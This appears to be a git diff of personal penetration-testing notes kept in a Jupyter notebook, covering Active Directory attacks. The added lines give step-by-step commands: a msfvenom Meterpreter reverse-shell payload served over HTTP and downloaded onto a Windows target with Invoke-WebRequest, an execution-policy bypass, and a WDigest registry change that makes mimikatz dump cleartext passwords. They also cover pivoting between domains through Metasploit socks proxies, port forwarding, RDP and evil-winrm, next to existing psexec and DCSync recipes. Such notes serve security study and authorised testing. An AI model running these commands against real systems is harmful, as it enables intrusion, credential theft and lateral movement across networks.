--- a/hnetwork_notes.ipynb
+++ b/hnetwork_notes.ipynb
@@ -463,6 +463,7 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
+    "* **[Pivoting Domains](#activedirpivotdomains)**\n",
     "* **[Dumping the NTDS.dit](#activedirdumpingntds)**\n",
     "* **[Golden Ticket Attacks](#activedirgoldenticketattks)**\n",
     "* **[DCSync](#activedirdcsync)**"
@@ -8917,15 +8918,13 @@
     "User:number:LM:NT:::\n",
     "\n",
     "```\n",
-    "\n",
-    "\n",
     "Obtaining a shell can be made possible from gathered system information, or through metasploit. To gain a shell through msfconsole, the **SMBUser, SMBPass, and SMBDomain** must all be known. For the SMBPass, both SAM hashes or plaintext can work. Similarly, the SMBUser can be the username of the captured hash or administrator. \n",
     "```bash\n",
     "msfconsole\n",
     "\n",
     "use exploit/windows/smb/psexec\n",
     "\n",
-    "set payload windows/x64/meterpreter/reverse_tcp\n",
+    "set payload windows/x64/meterpreter/reverse_tcp    #modify if necessary\n",
     "\n",
     "set targets [1, 2] # 1 is PS and 2 is native upload\n",
     "\n",
@@ -8948,7 +8947,25 @@
     "impacket-psexec username@x.x.x.x -hashes <hash_value>   \n",
     "\n",
     "```\n",
-    "If psexec is blocked, use `wmiexec` or `smbexec` with the same commands. "
+    "If psexec is blocked, use `wmiexec` or `smbexec` with the same commands. \n",
+    "\n",
+    "If there is an upload functionality that may lead to a reverse shell, the following payload can be created and hosted on a local webserver while listening on metasploit:\n",
+    "```bash\n",
+    "msfvenom -p windows/x64/meterpreter/reverse_https lhost=x.x.x.x -f exe -o script.exe lport=xxxx #change to reverse_tcp in some cases\n",
+    "\n",
+    "python3 -m http.server 80\n",
+    "\n",
+    "msfconsole\n",
+    "\n",
+    "use exploit/multi/handler\n",
+    "\n",
+    "set payload windows/x64/meterpreter/reverse_https #change to match payload\n",
+    "```\n",
+    "If there is PowerShell access on the Windows target, the following command can be used to query the payload and obtain a metasploit session\n",
+    "```powershell\n",
+    "Invoke-WebRequest -Uri \"http://x.x.x.x/script.exe \" -OutFile \"script.exe\"\n",
+    "\n",
+    "```"
    ]
   },
   {
@@ -9796,6 +9813,13 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
+    "Make sure to bypass the PowerShell Execution Policy in order to run PowerShell scripts by typing **powershell -ep** on cmd"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
     "<a id=\"activedirpassthehash\"></a>\n",
     "\n",
     "#### **`Pass Attacks`**"
@@ -9918,7 +9942,7 @@
     "\n",
     "Download [mimikatz_trunk.zip](https://github.com/gentilkiwi/mimikatz/releases) on the attacking machine. Extract the files; there should be four. Upload the files to on the compromised Windows machine.\n",
     "\n",
-    "Once the files are on the target Windows machine, run an administrative command prompt session and navigate to the mimikatz directory.Then, execute the mimikatz executable and se the privilege mode to debug:\n",
+    "Once the files are on the target Windows machine, run an **administrative command prompt session** and navigate to the mimikatz directory.Then, execute the mimikatz executable and se the privilege mode to debug:\n",
     "```powershell\n",
     "c:\\users\\username\\Downloads> mimikatz.exe\n",
     "\n",
@@ -9934,7 +9958,14 @@
     "sekurlsa::pth                     #pass-the-hash\n",
     "\n",
     "sekurlsa::tickets                 #lists Kerberos tickets\n",
-    "```"
+    "\n",
+    "```\n",
+    "To find cleartext credentials for a domain user, use `sekurlsa::logonPasswords`. This will typically dump the credentials from the LSASS process; however, if the registry key **UseLogonCredential** feature is not set to 1, this will not show the password in cleartext. In this case, the UseLogonCredential registry needs to be set 1 to see the cleartext password. To do this, open cmd as admin, run the following command, then restart the computer:\n",
+    "```powershell\n",
+    "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1\n",
+    "\n",
+    "```\n",
+    "After this is done, run the same command to see the cleartext password. **If proxychains is used, port forwarding needs to be set up again to access the domain again.**"
    ]
   },
   {
@@ -11238,6 +11269,88 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
+    "<a id=\"activedirpivotdomains\"></a>\n",
+    "\n",
+    "#### **`Pivoting Domains`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Moving laterally between systems or domains in a network typically requires leveraging credentials, vulnerabilities, or trust relationships to gain access to the second domain controller. \n",
+    "\n",
+    "First, get the IP address of the second domain by pinging the hostname from the first domain:\n",
+    "```bash\n",
+    "ping HOSTNAME\n",
+    "\n",
+    "```\n",
+    "If credentials are known for the second domain controller, either by enumeration, exploitation, or password reusue, native PowerShell tools can be leveraged to complete the pivot:\n",
+    "```powershell\n",
+    "$user = \"DOMAINCONTROLLER\\username\"\n",
+    "$pass = ConvertTo-SecureString \"password\" -AsPlainText -Force\n",
+    "$creds = New-Object System.Management.Automation.PSCredential ($user, $Password)\n",
+    "\n",
+    "Enter-PSSession -ComputerName \"HOSTNAME_B.DOMAINCONTROLLER.LOCAL\" -Credential $creds\n",
+    "\n",
+    "```\n",
+    "Once this is done, an interactive PowerShell session should open on the second domain. Opening a GUI session via RDP or WinRM may be a bit more complicated, however. If this needs to be done because the user is effectively chrooted in a directory, cannot execute commands, or preference, scan for open ports while in this session or via nmap to check to see if **RDP (port 3389)** or **WinRM (port 5985)** are open:\n",
+    "```powershell\n",
+    "Get-NetTCPConnection | ? {$_.State -eq 'Listen'}\n",
+    "```\n",
+    "```bash\n",
+    "proxychains nmap -p 3389,5985  -Pn -sT -v x.x.x.x     #from attacking linux machine\n",
+    "\n",
+    "```\n",
+    "**If RDP or WinRM are open, continue with the port forwarding process.** To make this process easier, access the first domain on **metasploit** by using exploit/windows/smb/psexec or exploit/multi/handler with the corresponding payload: windows/meterpreter/reverse_tcp. \n",
+    "\n",
+    "Before using the following module, make sure that the `/etc/proxychains.conf` file has the socks4 address set to 127.0.0.1 9050. Now, background the session and use **auxiliary/server/socks_proxy** with the following settings:\n",
+    "```bash\n",
+    "set SRVPORT 9050\n",
+    "set SRVHOST 0.0.0.0 \n",
+    "set version 4a       #use 5 if this does not work\n",
+    "run\n",
+    "\n",
+    "```\n",
+    "After doing this, have the sock proxy route all traffic through the meterpreter session by using the **post/multi/manage/autoroute** module. The subnet needs to be set to that of the second domain (the one that is to be pivoted); subnets are most commonly /24:\n",
+    "```bash\n",
+    "set SESSION x        #that of the backgrounded metasploit session\n",
+    "set SUBNET x.x.x.0\n",
+    "run\n",
+    "\n",
+    "```\n",
+    "Go back to the session, and while in the meterpreter shell, specify the IP address (not the subnet) of the second domain after the `-r` flag with the following commands **for RDP:**\n",
+    "```bash\n",
+    "sessions -i x\n",
+    "\n",
+    "portfwd add -l 1234 -p 3389 -r x.x.x.x\n",
+    "\n",
+    "```\n",
+    "Now, access the second domain via RDP. The xfreerdp command varies based on the version, but for xfreerdp3, the IP address of the attacking machine (local host) should be specified:\n",
+    "```bash\n",
+    "xfreerdp /v:localhost:1234 /u:\"DOMAIN_A_CONTROLLER\\username\" /p:password /dynamic-resolution /drive:Tools,/path/to/exploit/tools\n",
+    "\n",
+    "xfreerdp3 /v:x.x.x.x:1234 /u:\"DOMAIN_A_CONTROLLER\\username\" /p:password /dynamic-resolution /drive:Tools,/path/to/exploit/tools\n",
+    "\n",
+    "```\n",
+    "This process can be done several times, but the local port (after the `-l` flag) must be changed every time to an ephemeral port. In these cases, go back to the session, and while in the meterpreter shell, specify the IP address (not the subnet) of the next domain after the `-r` flag with the following commands **for WinRM:**\n",
+    "```bash\n",
+    "sessions -i x\n",
+    "\n",
+    "portfwd add -l 5678 -p 5985 -r x.x.x.x\n",
+    "\n",
+    "```\n",
+    "To access the next domain via WinRM, use the following command format:\n",
+    "```bash\n",
+    "evil-winrm -i localhost --port 5678 -u username -H NT_hash\n",
+    "```\n",
+    "If both ports (3389 and 5985) are open, use WinRM if there is only a hash for the account and if CLI is preferred, and RDP if cleartext credentials are known and if GUI is preferred."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
     "<a id=\"activedirdumpingntds\"></a>\n",
     "\n",
     "#### **`Dumping the NTDS.dit`**"
@@ -11362,8 +11475,8 @@
     "Using Mimikatz, a specific user mus tbe targeted. Try to target the built-in administrator account, or the krbtgt account to create a Golden Ticket for persistence first. Also, Mimikatz must be ran in the context of the user who has DCSync privileges; `runas.exe` can be used to accomplish this:\n",
     "```powershell\n",
     "runas /netonly /user:DOMAINCONTROLLER\\username powershell   #from cmd\n",
-    "Enter the password for DOMAINCONTROLLER\\username:\n",
     "\n",
+    "runas /user:DOMAINCONTROLLER.local\\username powershell\n",
     "```\n",
     "From the newly spawned PowerShell session, this attack can be performed as follows:\n",
     "```powershell\n",
@@ -11371,7 +11484,7 @@
     "\n",
     "privilege::debug\n",
     "\n",
-    "lsadump::dcsync /domain:DOMAINCONTROLLER /user:DOMAINCONTROLLER\\username:\n",
+    "lsadump::dcsync /domain:DOMAINCONTROLLER /user:DOMAINCONTROLLER\\username\n",
     "```"
    ]
   },
